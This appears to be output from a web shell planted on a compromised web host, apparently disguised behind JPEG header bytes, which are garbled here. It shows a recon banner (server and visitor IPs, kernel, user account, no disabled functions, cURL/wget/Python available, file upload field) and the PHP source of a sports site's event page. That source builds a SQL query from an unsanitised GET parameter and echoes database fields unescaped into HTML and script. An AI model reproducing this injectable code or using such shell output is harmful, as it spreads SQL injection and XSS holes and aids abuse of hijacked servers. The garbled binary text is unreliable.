����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 18.226.17.3 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/sportsmycareer.com/ |
Upload File : |
<?php include './head.php'; include './navbar.php'; if (isset($_GET['eid'])) { if (!empty($_GET['eid'])) { $eid = str_replace('-', ' ', $_GET['eid']); $run = mysqli_query($conn, "SELECT * FROM `events` WHERE `eid`=$eid") or die(mysqli_error($conn)); $row = mysqli_fetch_array($run); } } ?> <header class="page-header" data-background="img/blog.jpg"> <div class="container"> <h2>Event Detail</h2> <div class="bosluk3"></div> <p><a href="home">Home</a> <i class="flaticon-right-chevron"></i> Event Detail </p> </div> <!-- end container --> </header> <main> <!--About Info Alanı--> <div class="boslukhm"></div> <section class="hakkimizda-bolumu"> <div class="h-yazi-ozel h-yazi-margin-ozel"> </div> <div class="container"> <div class="row d-flex justify-content-center"> <div class="col-sm-8"> <div class="bosluk333"></div> <div class="galeri"> <img src="./events/<?php echo $row['image']; ?>" alt="What is Football?" class="galeri__gorsel galeri__gorsel--3"> </div> <div class="bosluk3"></div> <h2 class="h2-baslik-anasayfa-ozel-blog wow fade"><?php echo $row['title']; ?></h2> <div class="bosluk333"></div> <p class="paragraf wow fade" style="text-align:left!important;"><?php echo $row['details']; ?></p> <div class="bosluk333"></div> <div class="bosluk3"></div> </div> </section> <?php include './footer.php'; ?> <script> document.querySelector("title").innerText = "SMC - <?php echo $row['title'];?>"; document.querySelectorAll("ul.menueffect li a")[4].style.color = "yellow"; </script>